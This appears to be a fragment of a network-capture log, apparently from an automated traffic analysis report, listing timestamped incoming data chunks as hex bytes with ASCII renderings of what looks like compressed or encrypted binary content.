                                                                                                                  2023-08-03 15:59:56 UTC756INData Raw: f5 7b 39 a6 f3 06 5e 35 42 a8 0d 25 81 91 c2 49 68 fa 70 64 90 9a 50 c2 13 46 ba 8c 8b bc e6 57 bf 3d c1 da d5 ac da 01 d2 9e 5b a8 9d 64 79 5c a1 08 f5 12 f3 b1 27 39 10 af ac f0 7e 0d 70 f8 ba 8c 18 49 dd 26 2c bc ec a9 26 5e 8b 21 f8 df 9e 26 05 53 e3 7d d3 8c dd 8f 54 0e b9 ce e4 50 a5 9d 6e 1d 81 d3 a2 93 e9 8a f8 86 39 d6 d5 3d d3 db b4 0a bc 6c 74 df 29 b9 98 c4 c0 f5 f1 bd a6 1e 57 a1 47 1d b9 08 51 cf cd f4 65 84 89 b5 09 3a 6a ce 1c ea 8e 36 6f 55 52 91 55 3e 90 d1 67 5e 14 98 e3 66 ca a9 9d 54 41 58 51 bb ef 9b 84 41 e5 4e 0c 10 b2 84 74 db c7 f9 2e 4c b7 2c 97 d2 d2 0e 98 85 88 11 e9 41 ee 87 07 9f 47 9e cb 86 88 ad bd 75 61 cc a4 48 88 e4 8d d1 c7 00 85 fa 02 8b be a5 6e c2 c6 80 c0 95 36 bb 02 94 64 b3 ca b3 d7 88 90 a8 f1 69 73 fa ca 57 9a
                                                                                                                  Data Ascii: {9^5B%IhpdPFW=[dy\'9~pI&,&^!&S}TPn9=lt)WGQe:j6oURU>g^fTAXQANt.L,AGuaHn6disW
                                                                                                                  2023-08-03 15:59:56 UTC760INData Raw: 4e 0f a1 82 be af c6 6c b8 a6 45 a5 7a 5c 2c 77 2e 15 18 eb 15 30 7b f3 34 a5 49 b0 3e d8 33 76 1c 77 e9 75 fa 76 93 ce b5 cc 0b 12 a8 c0 c8 a7 77 cf 79 ec 34 fb fb c4 cf 25 b3 a7 54 f6 b8 c6 9f 1a 32 2b a7 05 b2 63 57 dc 54 ec aa 7c a8 67 a9 32 81 bc d9 50 3e c9 c3 75 20 7b 85 ce 45 5c 90 3f ac 8b 37 22 8b af f3 df 39 92 03 e5 26 b0 af 10 56 38 fa 74 a5 02 a4 63 c1 d3 c9 ea 9a 3f c6 3a b0 bf d2 9e 25 d4 1c 7e d1 f6 20 d0 9c 12 43 97 7b f7 69 e9 40 c7 62 40 3a ae aa 91 23 24 be 38 2c 97 85 55 02 c8 bf e9 85 43 88 d0 51 cf 02 05 e0 bb ed 00 75 a4 0a 93 fd f0 88 8f 31 37 bd 3c fc fe ca 49 3b 23 f3 f6 fc 26 0d 8c 13 99 3a c2 33 a7 a5 ec 64 99 61 03 7e b2 a1 3d 8f 5a e3 ac f0 7e 31 4c f1 04 20 2d 1e c0 0b 95 98 8d 88 98 df ea cf 8a b1 5c 08 ea d8 34 e1 21 8c
                                                                                                                  Data Ascii: NlEz\,w.0{4I>3vwuvwy4%T2+cWT|g2P>u {E\?7"9&V8tc?:%~ C{i@b@:#$8,UCQu17<I;#&:3da~=Z~1L -\4!
                                                                                                                  2023-08-03 15:59:56 UTC763INData Raw: c0 fd 81 63 e6 a5 79 cb 7a 43 94 19 b2 8a 9f 44 ed d6 ca 67 1a 20 12 49 70 39 a0 bb 44 55 f6 70 51 83 b2 3a e8 a5 f8 e3 42 56 a5 8d 54 7a a2 3f 40 31 29 71 ca db 61 24 73 99 ea 64 4c 5d 0c d6 b1 d4 4e c0 91 cf d7 6a c3 37 e5 cd 47 40 e4 10 35 69 94 98 f8 1b 34 c0 df ce d4 ef 23 88 95 16 67 6c 0e 78 30 9f de 67 4a 31 16 49 a1 f5 7f 1b a3 eb aa e0 2b 3e 7f 25 1f 09 9e 5e ed df 67 b6 b3 d3 ed 5c 4b a1 c9 1b ec 9e a7 09 6e 3d 33 ea 1a 11 b7 22 55 11 3a 2e bc fd 89 e1 9c 34 fa 0f 9d ea 9c 48 26 6c 0a 45 1e 32 0f 5b 98 37 f5 42 0a 0f ff 94 2b f7 51 31 a9 3c 37 27 db 9a 54 71 9f ed 89 ab 8d 8d a7 78 7f 9f bd e9 d4 db 08 3a d1 3e 67 4e e2 ab 87 80 e8 e0 19 53 e5 c0 16 9c cf 18 5a 57 cf d3 9f f2 03 16 eb cf d7 c9 7d 8c 44 3e 33 08 21 bc f5 5f 40 18 e9 1e 27 c8 da
                                                                                                                  Data Ascii: cyzCDg Ip9DUpQ:BVTz?@1)qa$sdL]Nj7G@5i4#glx0gJ1I+>%^g\Kn=3"U:.4H&lE2[7B+Q1<7'Tqx:>gNSZW}D>3!_@'
                                                                                                                  2023-08-03 15:59:56 UTC767INData Raw: 19 81 cf e5 b1 5c d5 6d 8b 57 52 3a 0d a5 6b 57 78 a3 7c 26 68 89 5c ab 74 06 3d cd 04 25 36 84 11 bc 41 05 fd b1 c9 ee 18 7a a5 f0 0c 8b e2 e6 1f c6 96 b0 7f 35 be 20 92 f9 82 d5 5e 0c 9e 3b 5b 97 1b ae 40 0f de 45 86 f2 9d 9e 30 35 66 a3 f2 4f 04 b7 53 39 66 6e 2e e6 37 58 4a 27 1a 7f c6 15 17 e0 fa 93 83 e7 e8 c3 d0 02 57 5e 76 be 70 92 24 47 0f ee 48 73 b3 9e 26 b0 fb 8e 5d f1 f0 b2 70 83 85 18 4e 9a d1 b8 5e 94 82 dc af ca 6b 4c 24 18 fe 7c 02 9c 5e d2 76 30 f0 f1 60 22 48 8f 02 3b 4a 9b 2e 56 33 41 d9 f3 96 ea a4 a1 5c a7 dd 0f 0c a8 9c cc 53 59 35 45 c0 50 c2 cc 24 03 6c fa 1f ee cb a8 c8 65 bb 7b 6a 56 e0 0c 4b 9d 06 8f a5 ac 47 6c 40 02 c4 29 61 bd 92 a1 bd ba 48 a0 1b 00 6e 49 48 2b 9c d9 5f b5 ee 63 f5 98 f9 64 1b 69 39 67 1e 0b e1 2a 6a 26 aa
                                                                                                                  Data Ascii: \mWR:kWx|&h\t=%6Az5 ^;[@E05fOS9fn.7XJ'W^vp$GHs&]pN^kL$|^v0`"H;J.V3A\SY5EP$le{jVKGl@)aHnIH+_cdi9g*j&
                                                                                                                  2023-08-03 15:59:56 UTC772INData Raw: 1c 7f 8f f4 79 14 ed 54 62 86 d1 64 a1 17 e6 c9 05 98 5e b8 95 16 91 f8 07 89 12 87 2a e9 7f b2 06 6d a4 c2 71 3c 3d 1d 80 59 d7 01 27 da 10 d5 5c ed 07 89 a6 f6 bf 2a 5d ad 41 18 19 5d 6d e9 04 1f 88 95 76 21 68 8f a4 73 94 fa d8 ce 95 7f 8a 85 4d 50 de ce 6e c0 1f 1e 5f bb a7 ed 8b 7c 5a fe 6f 3c 03 c5 20 8c 56 15 d0 f6 8c f8 79 5c 64 93 4c 90 d2 b1 c3 51 92 3b 05 6d cc 4d 4b f9 31 bc c0 9f 6b da 9b dc e4 a1 23 be c0 5f 74 f9 f6 62 84 ea 2d b4 25 6c a3 63 2a 53 8d 44 5e 29 82 fa dc 8b 13 7d c6 23 36 1b 06 3b 13 90 6e 23 9a db 80 42 13 2f d9 0e ee 75 50 13 c7 45 de 88 b6 73 16 0d 77 81 de 0d 57 fb 65 1a 60 46 83 18 41 a0 5c 15 d6 02 56 08 2d 3b 7e 45 f5 9b 1b 92 16 48 27 5f b4 db 1d d2 22 f3 b0 eb 1c 4c 0e 4b 35 0c fe df 23 27 c7 12 83 fe 7e 15 1c ef 69
                                                                                                                  Data Ascii: yTbd^*mq<=Y'\*]A]mv!hsMPn_|Zo< Vy\dLQ;mMK1k#_tb-%lc*SD^)}#6;n#B/uPEswWe`FA\V-;~EH'_"LK5#'~i
                                                                                                                  2023-08-03 15:59:56 UTC776INData Raw: 38 fd be 78 d1 30 7a 32 32 7f 9d 56 3a 7f a8 b6 c8 6e 71 f1 27 86 46 b0 23 7c d4 c5 20 44 1c f2 e4 b8 48 ce 2d 99 07 37 b3 4a f6 1a f9 7b f6 72 1b f1 47 da 53 7a 8f 9b 86 b8 f3 d4 46 a0 71 a7 48 20 0d 0b 37 dd c9 10 04 cf ce 96 4a c3 7c 0b e1 3b d8 1e ad 66 68 97 73 07 44 de ed 40 c0 52 da 1c 6f 59 09 93 50 84 74 e7 37 bf ff dc 0c 35 82 d3 6e b1 76 f7 54 36 b5 76 60 d1 7a 13 6d 5b da 39 5b f9 6c fc fd b7 90 1f 5f 59 e1 9c 1d 72 83 c2 53 60 cd c8 7d a0 2c 7e c4 ce 94 31 8e e0 e2 50 a4 55 41 5b 7d ee 40 14 44 f3 de 7c a4 cf a7 98 e4 bd 83 c1 e4 9f 56 82 7d f5 67 af 93 5f fa f6 5f e8 19 9f 1c 76 91 6b 53 d7 99 6e ac d9 ed d7 41 c5 5b 41 93 10 a3 51 46 35 07 ca 7c a5 2a 7f 33 84 16 0c 98 1c 01 d3 63 8a 82 28 9b df 67 98 c5 15 ef ce 48 0a ff 5e b4 4c b1 05 03
                                                                                                                  Data Ascii: 8x0z22V:nq'F#| DH-7J{rGSzFqH 7J|;fhsD@RoYPt75nvT6v`zm[9[l_YrS`},~1PUA[}@D|V}g__vkSnA[AQF5|*3c(gH^L
                                                                                                                  2023-08-03 15:59:56 UTC780INData Raw: 0e c9 0f 99 cc a2 66 50 a3 20 46 3a 59 43 90 10 11 9c 79 3f 24 3c 54 25 15 a9 3d 9d 50 82 74 d1 94 51 34 36 a2 c9 c1 3c 28 72 9a 65 aa 6f 7c a2 84 b1 8d c1 9e de ca 67 05 f9 68 b3 eb 60 9c a2 26 48 55 87 c7 9f bf 6d 5a 20 57 95 56 19 69 64 1a 5e 0c 74 15 1c 3e d5 82 fe 0e bd b0 53 8d d5 8a 40 4f 5b 13 80 a4 04 8e 51 4f a5 09 57 f7 80 79 11 f9 40 07 ba 5a 79 7f 00 b8 7e 98 ff 1c c9 8d 67 75 75 de 6d a8 cc b9 65 ba 1c 2a cd 85 5d 7c 25 a6 56 6b 21 80 f3 f1 fb 8b 19 1c b0 2a 4c 52 8d 18 a6 f5 53 2f 78 38 d7 b3 13 5e 54 ef e2 95 fb 99 84 90 fa 2f a5 65 b3 32 3a 20 dc 48 bc bc e2 91 71 ff db 0b 36 e3 a8 f2 24 c3 f3 03 14 07 d9 41 77 d6 db c5 9d 35 f5 ae b6 a2 85 83 88 26 fa 98 f5 95 4e dc 49 69 ed 1b 95 5a 36 0d 11 4c c6 61 5a 76 1a 1d dd 3e 81 5b 57 e5 a7 df
                                                                                                                  Data Ascii: fP F:YCy?$<T%=PtQ46<(reo|gh`&HUmZ WVid^t>S@O[QOWy@Zy~guume*]|%Vk!*LRS/x8^T/e2: Hq6$Aw5&NIiZ6LaZv>[W
                                                                                                                  2023-08-03 15:59:56 UTC784INData Raw: b9 9f 54 06 4c 24 d9 ad 11 82 18 ca 2f 05 04 00 92 e2 34 9b 5a f9 51 d0 59 c9 21 e7 6e 85 24 8a c9 6b 92 14 ef 49 61 e5 fc d7 81 55 04 be 4b 6e 86 8d ec 38 4a c0 21 48 62 29 46 74 79 e5 cb 8f 63 bb 68 51 db 9f 4a 68 2b 65 cf be 46 91 01 4b 26 bc c3 43 93 1d 0a 83 25 c8 8b 20 67 f9 99 33 73 77 43 d2 23 cb f7 10 0f ae 1c d2 ea 74 a6 c8 57 78 d7 20 f9 d6 fb ad b5 10 98 c4 00 e1 c0 62 88 e7 2f 4d 06 95 d6 fe 49 e2 d2 39 cb ce 56 57 af 32 f8 fd 60 33 ad b1 75 5e 65 30 4d a6 5d f5 aa 94 4a 4f 3f f4 e6 a9 9f 71 bd 52 64 10 a8 75 a8 1c ea 56 a4 2c df b5 62 49 39 3d 48 7f 2c b6 5e cd 60 0b 42 5d ba 0e a7 1d 5d 62 34 9b 62 18 e3 7e ec df d1 ed 48 6e 12 22 75 10 f2 45 5a 89 bd da ac 26 7a 7d 20 0c 97 8a 9f 7f be 30 b8 12 d4 bc 8a 14 d0 d7 74 b8 0f 6f c7 b6 56 ce 3c
                                                                                                                  Data Ascii: TL$/4ZQY!n$kIaUKn8J!Hb)FtychQJh+eFK&C% g3swC#tWx b/MI9VW2`3u^e0M]JO?qRduV,bI9=H,^`B]]b4b~Hn"uEZ&z} 0toV<
                                                                                                                  2023-08-03 15:59:56 UTC795INData Raw: 15 b2 a6 5e bb 4e b6 d7 09 43 6c 7d 69 4c 63 8e f6 49 41 37 5e 77 fc 60 9b 97 65 56 fa 2d 80 2c d4 ca 5f 45 93 70 c5 2f f0 cd 37 ee b6 69 03 30 5e 78 c1 2f 7c 5a a8 38 f4 27 43 70 78 8b dd 49 28 d0 b8 db 1b 92 31 ff 0e 93 0f a6 10 6a 30 c5 ca 80 62 c4 8b 8e a5 c9 68 0e f5 e6 b7 57 4f 79 e4 62 64 68 9f fe 93 33 a1 da 83 da 07 7f ab fb e4 d1 80 53 64 6a 0e 7e 4d b6 87 3c 7a 92 01 c2 61 cf f1 03 0a 02 36 5a b0 d1 2d c6 50 95 03 9b 9a 9a 47 98 0c ae 40 a0 41 e2 9b f1 b1 37 5c ba 87 b1 98 c5 4e 22 52 d0 9a 9b 17 56 82 68 0b 00 7f 4e ce 05 46 08 b5 b7 f6 87 b2 3b 1e 79 1e fe 7c ab 64 4d 03 c5 fb aa 44 6c 77 87 95 f9 8d 1a 1e 11 94 3e ee 05 c7 78 32 61 f0 90 80 9e e1 f8 c8 b3 27 b8 82 8c 34 95 5a 3c 06 c4 91 7e 6a 46 eb 59 89 64 be 04 96 18 d4 bb 1d f3 45 e3 d3
                                                                                                                  Data Ascii: ^NCl}iLcIA7^w`eV-,_Ep/7i0^x/|Z8'CpxI(1j0bhWOybdh3Sdj~M<za6Z-PG@A7\N"RVhNF;y|dMDlw>x2a'4Z<~jFYdE
                                                                                                                  2023-08-03 15:59:56 UTC811INData Raw: 8b 7a cf 3e 86 8c 6b 8a a4 db a1 51 82 56 64 12 23 b2 3a 1c 66 50 af 8b 69 ef b7 72 c6 ec b3 db 25 72 2c 46 8c 7c e1 8b 88 45 cd 99 50 85 f3 45 e9 04 8a 33 42 1e d1 ce 1f 1a 49 95 fd 67 5f 4f 22 ab ec fb 87 dc ff be 8b 2c b7 6a 5a f2 53 66 3a df 7b 6e 08 d5 f9 1a 3c 08 54 38 0b 78 4c 03 bc 27 c1 ef d0 9b 41 18 a8 dd e1 c9 b6 5c c7 f6 97 d5 52 7d 3b 77 3b 0c 3b 48 82 8b 6d b4 a4 46 c9 d9 85 35 b9 08 11 b4 04 95 7d eb 21 a3 a3 99 31 1a ed c2 3c f3 a2 ce 97 c0 81 ae 7e b5 3a 38 be 4f ee 51 a7 1c 11 dc 42 77 c5 bc 30 3a 32 50 4e e8 e9 09 4f 7d 50 e0 c8 d0 33 d4 25 6d a4 68 05 36 b2 37 91 87 fa 6d 75 57 55 a4 1b de 74 7f 4e 15 cc 31 20 52 d7 07 25 24 fd ac 0e 50 dc 48 62 bf 50 cc a6 58 dc 6a de 68 ca be b8 bc fa ee 23 9a 76 49 99 90 38 81 28 8c cf 96 32 9a da
                                                                                                                  Data Ascii: z>kQVd#:fPir%r,F|EPE3BIg_O",jZSf:{n<T8xL'A\R};w;;HmF5}!1<~:8OQBw0:2PNO}P3%mh67muWUtN1 R%$PHbPXjh#vI8(2
                                                                                                                  2023-08-03 15:59:56 UTC825INData Raw: 54 bd 43 90 2a 18 3e aa e9 f9 d3 7d 17 aa b2 49 c3 16 ac c4 54 d6 3e 25 43 e9 ba 44 a6 bd e9 7b 7b d4 19 55 f6 8f 16 b4 7c 51 78 4f cf e7 66 ec 53 91 3f e0 24 83 6e 0c bd 9c 67 67 3f 51 3e a9 1f 49 34 76 9f 71 0b 8d 79 f5 e0 e8 2b 54 57 81 26 2c 8b b7 2f b2 00 ed 49 fd fd c5 52 db 69 c9 f6 99 47 64 80 bc 82 94 08 0e b9 5a 85 81 b7 85 a2 ae 9d d5 01 e3 28 fc ef a5 ed 51 33 4d 4f 0a 71 43 4d 07 e9 74 a3 60 ae 8b 7d 66 15 90 52 31 37 95 62 bd 8b 0e ee e8 99 19 3f 8c 2e e6 b8 c7 d9 8f 87 d0 01 48 59 70 01 df 20 67 9d 1c af 3f 63 b2 10 9e 7c 42 00 34 79 86 03 90 04 49 7b 25 70 24 85 a1 5f 92 f9 76 90 89 99 32 74 78 a5 8b 4c 86 76 ba 2d b6 b6 83 86 94 d1 9c 0e 55 24 2e 7a 53 aa 05 08 7f 9a c6 11 7b 32 37 48 a4 4b f1 f9 62 41 11 c6 d9 93 ea 6f 60 bb 9a e5 30 1a
                                                                                                                  Data Ascii: TC*>}IT>%CD{{U|QxOfS?$ngg?Q>I4vqy+TW&,/IRiGdZ(Q3MOqCMt`}fR17b?.HYp g?c|B4yI{%p$_v2txLv-U$.zS{27HKbAo`0
                                                                                                                  2023-08-03 15:59:56 UTC841INData Raw: 4e 16 7c d4 37 be ee 7a 8f 7a b8 04 68 45 f9 92 84 ed 91 cc 7f 61 b1 21 39 96 8c 88 af a7 e1 cf bf a7 ec 93 11 4e f4 c0 a3 df d6 b6 7a 30 61 03 8c 1b a9 a3 88 62 e2 fa ba 02 4b b1 d4 ab a7 3f 7e 81 a0 42 ad fb a6 27 c1 77 b0 6e bf d5 d7 dc 71 63 6f f7 a9 4f c3 a3 9d 52 19 e9 6b 58 d7 bb a0 27 90 86 0f 41 7b 7c 8e e4 bf 0f 5c 71 26 2b 97 38 d0 f3 17 6d a2 b3 39 2b b9 31 cb c5 ec 96 6c cf a0 e3 03 3c aa 5c a9 c6 9a f2 f7 f1 1a 76 25 cb 22 0b 1a b7 71 78 e0 54 e0 cc da 77 6b a1 4b 89 11 78 33 6f 9a e7 8b 7c 50 aa d3 ed 8d bb 4e d8 d2 db b0 06 0b 02 79 dd 44 24 e8 4b 3e 1a e1 87 6b e6 0c 73 ee e3 fe a5 51 d9 b3 1e 7c f6 f9 03 1f cf 3c ef 1d ac bb 4a 4d d5 df 6b 8e bb e4 07 45 ab 66 25 3b ae 65 7d 3a 1d d8 69 12 29 8e 6e f6 ec 9b 68 8b d7 ca 29 eb fa c0 98 d8
                                                                                                                  Data Ascii: N|7zzhEa!9Nz0abK?~B'wnqcoORkX'A{|\q&+8m9+1l<\v%"qxTwkKx3o|PNyD$K>ksQ|<JMkEf%;e}:i)nh)
                                                                                                                  2023-08-03 15:59:56 UTC857INData Raw: 6a 96 50 25 43 26 2f f0 41 58 aa 76 d4 2a 79 79 aa 23 83 c4 dc 45 bb 77 ab 37 3b 2a f8 b9 12 5d 93 f3 f1 88 79 1e 6b 8b 96 78 0b 5b aa 16 3b f8 d9 2d 05 a5 0c 69 01 c0 65 f3 54 b3 cb d2 e6 47 ed db bf a0 d5 d1 36 24 2e 8c 00 17 d2 b6 2f 46 06 6c c3 fc d6 b6 2b 32 2c 76 be c5 f4 d0 02 0e 3b bd 02 36 47 5d b0 48 8d e9 fa a6 c2 2a c4 f2 9f eb e0 1b a5 6e fc 8b 44 5b f1 81 37 fb 15 34 50 d7 e5 2b c9 d8 9d e7 5b ca 24 88 bc f4 ca a4 af 34 3a 34 d1 bb 3b ea 29 b3 a4 d4 c0 dd 55 96 38 87 e7 9f 4e 75 da 4f 49 54 29 37 d9 3c d8 ed 08 34 01 52 db dc 8d b3 11 a0 4f 2a 76 cc d6 98 45 d0 6d 68 d8 27 ac 94 ff d5 c6 2b 73 a4 10 d4 ca e1 51 c3 5a 1d b6 50 40 c9 b4 74 a5 a3 69 8a 93 5e 65 2f c1 8c 2e bd 0e 09 45 8e 5b be 72 d6 a6 c4 3c de 84 e3 03 3a ae 3f b6 53 b3 f2 82
                                                                                                                  Data Ascii: jP%C&/AXv*yy#Ew7;*]ykx[;-ieTG6$./Fl+2,v;6G]H*nD[74P+[$4:4;)U8NuOIT)7<4RO*vEmh'+sQZP@ti^e/.E[r<:?S
                                                                                                                  2023-08-03 15:59:56 UTC873INData Raw: 31 73 0b d9 24 39 c7 c2 de 02 86 ad d8 4b ab c7 2a 36 20 a9 a5 3e 6d 1e 8d 82 c0 40 2b 83 a4 5c 59 98 88 51 91 6b 48 3c 67 9e 0b 23 e1 31 dc 2f 39 be 0b c9 b2 88 20 80 65 29 b6 df b5 7f c4 0f 4e 01 9c 73 ee bc dc e9 57 45 79 a7 26 8c 9b 98 c6 5e 13 3c 88 df db 4c 97 a9 c8 42 52 49 f4 ce 9e 6a 33 4d f3 60 f0 e7 50 b1 42 e9 5d b9 b5 70 e7 b6 4d 00 f4 94 69 27 f5 e8 56 02 b0 d4 ac 80 ce ca 42 b5 20 ae ad d1 2b da f2 e1 90 69 54 ec e3 54 51 4e 3e 41 25 68 0b 4e 4d fa 90 e7 af 62 13 e6 c8 56 b0 ca 0b 8c c5 28 17 79 20 13 84 ad 38 64 e8 8e ec ab 42 61 d7 36 32 43 b2 4c ce 98 8f 06 d4 02 ee a8 77 a4 93 3b 86 12 be b8 25 82 d8 f5 95 88 cb e8 67 c6 62 ce 1c c6 b0 99 eb b4 fa bf ef b5 cc ce 9b f1 b7 9c 04 df 80 7d 63 23 f1 0b 27 3c 0c 29 c8 3f 43 54 b2 5c ca d1 7a
                                                                                                                  Data Ascii: 1s$9K*6 >m@+\YQkH<g#1/9 e)NsWEy&^<LBRIj3M`PB]pMi'VB +iTTQN>A%hNMbV(y 8dBa62CLw;%gb}c#'<)?CT\z
                                                                                                                  2023-08-03 15:59:56 UTC889INData Raw: 98 d0 dd 36 e3 94 cb da 07 3e 3e 67 dc b4 98 77 64 ce aa 61 98 30 eb 37 a4 7a f7 f7 a9 c3 4e 2b dc 67 60 37 74 d4 e0 b1 3f f0 07 26 05 17 30 d6 a7 26 00 9d b5 bf 92 11 80 34 bf 75 7b 7f fb 5c 90 74 d6 33 14 3d 66 18 be a8 7b 23 14 6c 65 5d 5f 42 24 5a 70 59 83 82 b8 e1 de 9b ec 2f 51 d6 5b c9 0b 14 de f5 0c 34 ef 0e 04 08 c8 e9 a6 df 3e ee c8 6a e6 ff de 4d 8a 16 e1 4f 75 18 cc 37 61 52 87 5a ff 37 46 ba 0b 58 13 0c 42 d0 6c 10 a3 9d e7 a9 55 b9 09 c8 f1 73 9d bc a5 70 bc 34 1a 0b 11 58 44 d1 90 a7 95 91 4d ad 16 d8 38 d3 99 93 10 a2 27 e0 31 62 dc 8b 2e 79 9f 89 32 88 af 51 1d ab 12 13 9b 41 4d 7c 5b dc 04 29 d7 96 e2 1d 1d 19 98 8e d4 e2 e6 f3 78 6f b5 74 03 28 ba 9b f1 6f 2c 60 01 1b ac 94 74 c6 cc da 7c aa 13 81 7c 62 49 ec 4c 6f 87 18 f3 3f fd 94 06
                                                                                                                  Data Ascii: 6>>gwda07zN+g`7t?&0&4u{\t3=f{#le]_B$ZpY/Q[4>jMOu7aRZ7FXBlUsp4XDM8'1b.y2QAM|[)xot(o,`t||bILo?
                                                                                                                  2023-08-03 15:59:56 UTC905INData Raw: 3f 90 ae cf 95 23 82 db 5c c4 b4 9a 40 71 ec 07 5f b8 89 6f a1 dc 9d 13 e8 cf d3 90 df 7f e6 b5 5d 98 98 18 b0 0f 93 2b 1f c4 0a 66 72 5e 57 ea 8e 76 2d 3b 26 f3 42 eb 4a e6 e7 98 65 f9 b2 9c d2 33 e6 6b 89 d1 fc 5d 95 4e 55 95 6a 85 a2 d6 10 ef a8 90 1c 4a 20 dd ca 2b dd f8 8e 88 1a 9d bf 9b 75 89 a5 ba 47 33 02 9d 1c 2c a4 6e c2 0f 19 0d db b9 bb 28 ac df e9 f5 4c 45 e4 56 d1 9e b7 ba 3c 6a f1 19 7f 0e 5b 22 34 9e 66 59 dc b8 6d e9 7f a1 9d 6c b8 51 e2 77 37 5e d6 69 f1 d8 a3 8d ce 19 be 27 8e 66 2d 36 f1 3d c3 7b 84 b1 ef 7a fe f2 a1 31 22 2c 53 95 3e 60 d4 f4 2e 3c d4 5b fd cb d7 cd f3 7f 77 0f 94 ec 7f 20 c4 a7 10 1e 03 a4 c3 51 0b 7d 28 57 84 46 57 d6 43 c8 62 56 13 2f b9 a0 d3 fd b9 f2 89 d2 77 52 66 d5 c6 4e 58 28 9d 8c 7c 55 06 6b 79 73 20 0f 6e
                                                                                                                  Data Ascii: ?#\@q_o]+fr^Wv-;&BJe3k]NUjJ +uG3,n(LEV<j["4fYmlQw7^i'f-6={z1",S>`.<[w Q}(WFWCbV/wRfNX(|Ukys n
                                                                                                                  2023-08-03 15:59:56 UTC921INData Raw: bb b8 e2 7c 4c 77 c8 d3 9d 50 65 11 cd 8e 6d fc 42 02 22 47 c3 5f f7 0b 7c 68 6c 75 71 91 63 72 53 c2 57 6a 68 80 9a 44 9b 36 06 f6 2f 77 d5 8b b0 3f 25 7b 67 c5 dd 91 26 bc 8c 1f 92 7d 5c 65 28 58 5f 59 32 54 34 04 70 f0 b9 a1 2c 62 07 56 fc 93 86 5d 02 19 88 a5 3e bb fc da 0e 2a 99 5b da 47 90 05 ca da e6 c1 c2 60 ed 36 ae e8 51 2b 7c 77 d7 88 82 79 13 3b d1 13 76 38 f7 bb fa 6f 29 cd a5 67 9c 3c e9 9c cf 12 10 5f 09 ac cb 39 77 4e de e6 a8 73 38 4e 58 7d 88 b7 d8 e8 42 c5 06 0e 57 89 6e 8e 56 49 bb 54 fc db da 68 d2 68 24 e5 ec 5d a9 78 0f 29 47 2b c5 f7 1d 43 94 58 df e7 f4 71 d2 81 39 b4 f5 fc d4 8e 26 bc d5 b1 ab 16 9f 05 68 60 20 89 fe e4 df 85 b1 aa 84 34 08 b8 d6 f7 5e 6f f4 71 e6 46 db 8e 18 2f 2c 00 ea 5d 8b 4c 96 3e 6f d7 bb 8d 32 cc e7 c7 f2
                                                                                                                  Data Ascii: |LwPemB"G_|hluqcrSWjhD6/w?%{g&}\e(X_Y2T4p,bV]>*[G`6Q+|wy;v8o)g<_9wNs8NX}BWnVIThh$]x)G+CXq9&h` 4^oqF/,]L>o2
                                                                                                                  2023-08-03 15:59:56 UTC937INData Raw: 1b ff 36 ad ac c6 c0 ae 77 63 1d ff cc 28 3f 3d 84 95 32 35 43 d8 ba 65 a2 b2 4e a8 cd b6 c6 1a 0e d7 50 4d e4 7d 6d 61 3a f0 69 44 45 b3 af b9 31 e8 f2 1f bf fe ce 5c 6c a1 c8 06 97 f2 35 c5 8b 2b 83 90 99 3a c1 fd 88 82 2e 11 42 48 e7 70 c6 ad e0 58 62 b4 de 79 10 ba 07 da 9d b3 1c 91 27 99 37 1f ce ea 5a 53 f2 0d 53 21 7d 59 3f de e0 d0 25 92 9f 39 dc 1c 8f c3 73 e5 c6 85 bd 93 ac ea e1 dd 9d 70 54 68 9d c5 bd ca 67 70 c8 4a 52 a3 b0 3e 0c 4d b8 70 4a 04 ed 94 6d 12 d5 a5 66 be 3f e8 c3 f8 4e 19 13 41 a5 e7 b4 2f a0 27 8d 1b ab c3 f1 59 a6 05 53 33 77 6e f6 e2 8f 10 44 9d bc 48 b4 d8 c4 1d 8a 1e bd 17 9b 17 87 cf 1b 7f fe b8 48 20 9c 31 99 48 c7 fb 1f f9 ee 86 9f fd 0c 51 df f6 d0 f3 84 48 cb 10 f9 3e 3f 74 9c 24 01 05 7e 7c e3 15 ab 80 3e f5 ca 7b 1b
                                                                                                                  Data Ascii: 6wc(?=25CeNPM}ma:iDE1\l5+:.BHpXby'7ZSS!}Y?%9spThgpJR>MpJmf?NA/'YS3wnDHH 1HQH>?t$~|>{
                                                                                                                  2023-08-03 15:59:56 UTC953INData Raw: f4 15 d3 d8 24 06 f3 ca 55 03 e4 02 88 bc a5 84 89 39 79 1b 9c 32 8b 2f 4c d7 23 d7 d3 b1 54 d1 b3 90 87 cf 6c c5 3f e3 47 97 79 cd d9 59 5b 4f 59 38 1e 1f d2 f3 7f bb fe c8 80 ac 0f 59 88 2c 67 c6 02 f6 4b 2e 84 a5 c1 6c 57 5e 82 69 ba ea 0b e6 02 a9 c6 5b 27 8d 70 19 b4 ca e1 15 a0 97 3e c5 ba 05 b1 a7 fb 61 22 a9 12 3c 26 54 26 f6 37 a4 88 3c 25 20 e2 fa 44 c9 c3 2e 19 83 5e 66 f0 44 c8 d7 12 78 45 c2 03 ab 1f 7a 26 90 73 82 ef c3 6f 39 15 16 0b f5 d7 04 fa 06 1d d5 4a 21 51 be 82 8e a8 51 7d 46 77 96 85 c3 11 78 79 bf a8 3f ea 1f e8 c5 6f 38 98 51 75 89 eb 64 e8 c8 16 68 2b 69 34 1a 15 0c 1a 6e 4b 11 fa c6 00 88 a7 8c 2c a7 fe e6 80 76 c5 97 27 05 ec b9 b2 8e 51 c9 ba b7 43 bd 72 80 cf f7 00 f9 22 b7 bc 35 48 4b ee ec 90 8f 76 22 32 e5 d1 f9 70 a6 d6
                                                                                                                  Data Ascii: $U9y2/L#Tl?GyY[OY8Y,gK.lW^i['p>a"<&T&7<% D.^fDxEz&so9J!QQ}Fwxy?o8Qudh+i4nK,v'QCr"5HKv"2p
                                                                                                                  2023-08-03 15:59:56 UTC969INData Raw: 92 89 9e ca 72 51 22 0a f3 ce 1a b6 ee d1 8f b1 55 4a 22 db 8d 4f 74 bf 57 ce b5 8e c2 04 8a b6 67 17 5e a0 dc d8 da 69 5a a6 ff 97 09 7a 4a 41 a1 fe 9d 63 34 f4 a8 c4 38 9b b3 f8 c1 f0 c8 3b 31 d2 d9 37 9e 05 44 f7 22 93 6a e6 ab 02 f9 62 13 ec fb d3 1b 3b 2e a2 3b d2 42 ba 76 55 28 b5 fe a6 cf 18 44 fd 58 2c 08 e0 df 82 42 23 e6 56 b2 b7 3e 37 da 3d a3 8a 0a 65 64 bc bb 54 be 05 1a 0b 8f 98 3e 42 9d 62 90 e2 23 b2 28 86 6e 09 6a 0a 54 93 18 53 e1 bb c4 98 aa 7a 22 5e 1c be 6e fd 32 ae 13 43 8e 52 71 21 9c 7b a4 e1 93 a2 95 e4 10 67 e9 77 43 